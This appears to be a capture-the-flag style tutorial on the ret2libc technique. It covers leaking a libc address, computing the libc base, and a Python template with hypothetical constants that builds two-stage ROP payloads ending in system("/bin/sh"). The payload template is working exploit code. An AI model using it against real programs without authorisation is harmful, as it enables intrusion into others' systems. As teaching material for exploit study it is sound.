ret2libc
Leak a function address from libc => Compute libc base address => call system("/bin/sh") or use one_gadget
Theory
If the binary is dynamically linked, we can reuse code from libc instead of gadgets in the binary itself. For example, if the binary calls puts() and we control EIP/RIP, we can call puts(puts@GOT) to print the runtime address of puts inside libc. If libc.so is given, attach it and read the symbol offsets from it (readelf -s / pwntools ELF); otherwise, use a libc database to identify the libc from the leaked address (the low 12 bits do not change under ASLR) and get the offsets. We compute the libc base address:
libc_base_address = leaked_address_from_GOT - puts_offset
Then we compute the system() address and the address of the "/bin/sh" string in libc:
system_address = libc_base_address + system_offset
bin_sh_address = libc_base_address + bin_sh_offset
In the end we call system("/bin/sh"). On 32-bit x86 the argument is taken from the stack; on x86-64 it must be placed in RDI with a pop rdi; ret gadget, and the stack usually needs an extra ret for 16-byte alignment. With ASLR on, the base changes every run, so the leak and the system() call must happen in the same process. Read this writeup to learn more:
Template:
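The following is an added example (not the original page's template) that shows the two stages of the technique for a 64-bit, non-PIE binary: the first payload leaks puts@GOT through puts@plt and returns to main, the second computes the libc base from the leak and calls system("/bin/sh"). Every address, offset and padding value below is a hypothetical constant chosen for illustration; in a real exploit they come from the target binary (objdump, pwntools ELF), the leak, and the matched libc (libc database or readelf on the given libc.so). The sample leak bytes are constructed to match those constants.

```python
import struct

# Hypothetical values for a 64-bit non-PIE binary (replace with the target's).
PADDING = 40            # bytes from the overflowed buffer to the saved return address
PUTS_PLT = 0x401030     # puts@plt in the binary
PUTS_GOT = 0x404018     # puts@got.plt in the binary (holds the resolved libc address)
MAIN = 0x401136         # main(), so the process survives the leak and can be overflowed again
POP_RDI_RET = 0x4011c3  # "pop rdi; ret" gadget in the binary (first argument register)
RET = 0x40101a          # plain "ret" gadget, used to keep rsp 16-byte aligned before system()

# Hypothetical offsets from the matched libc build (readelf -s / strings -tx libc.so).
LIBC_OFFSETS = {
    "puts": 0x80E50,
    "system": 0x50D70,
    "/bin/sh": 0x1D8678,
}


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian address (same as pwntools p64)."""
    return struct.pack("<Q", value)


def parse_leak(raw: bytes) -> int:
    """puts() stops at the first NUL byte, so a userland address arrives as 6 bytes.

    Pad to 8 bytes before unpacking; the top two bytes of a 47-bit address are zero anyway.
    """
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]


def compute_addresses(leaked_puts: int, offsets=LIBC_OFFSETS) -> dict:
    """libc_base = leak - puts_offset; system and "/bin/sh" are base + their offsets."""
    libc_base = leaked_puts - offsets["puts"]
    # Sanity check: a mapping base is page aligned. If this fires, the libc offsets are wrong.
    assert libc_base & 0xFFF == 0, "libc base not page aligned: wrong libc version/offsets?"
    return {
        "libc_base": libc_base,
        "system": libc_base + offsets["system"],
        "bin_sh": libc_base + offsets["/bin/sh"],
    }


def leak_payload() -> bytes:
    """Stage 1: puts(puts@GOT) prints the runtime address of puts, then return to main."""
    return (
        b"A" * PADDING
        + p64(POP_RDI_RET)
        + p64(PUTS_GOT)   # rdi = &puts@GOT, so puts prints the pointer stored there
        + p64(PUTS_PLT)   # call puts through the PLT
        + p64(MAIN)       # restart the vulnerable function for stage 2
    )


def system_payload(addrs: dict) -> bytes:
    """Stage 2: system("/bin/sh"). The leading ret realigns the stack for system()'s movaps."""
    return (
        b"A" * PADDING
        + p64(RET)
        + p64(POP_RDI_RET)
        + p64(addrs["bin_sh"])  # rdi = "/bin/sh" string inside libc
        + p64(addrs["system"])
    )


if __name__ == "__main__":
    # Constructed sample leak: puts at 0x7f3f6c080e50, printed by puts() as 6 raw bytes.
    sample_leak = b"\x50\x0e\x08\x6c\x3f\x7f"
    leaked = parse_leak(sample_leak)
    addrs = compute_addresses(leaked)
    print("stage 1:", leak_payload().hex())
    print("leaked puts: %#x  libc base: %#x" % (leaked, addrs["libc_base"]))
    print("system: %#x  /bin/sh: %#x" % (addrs["system"], addrs["bin_sh"]))
    print("stage 2:", system_payload(addrs).hex())
```

In a live exploit the two payloads are sent to the same process in sequence (for example with pwntools' sendline/recvline), reading the 6-byte leak between them; because ASLR re-randomizes libc on every execution, a leak from one run is useless for the next. The page-alignment assertion is the quick check that the chosen libc offsets match the target.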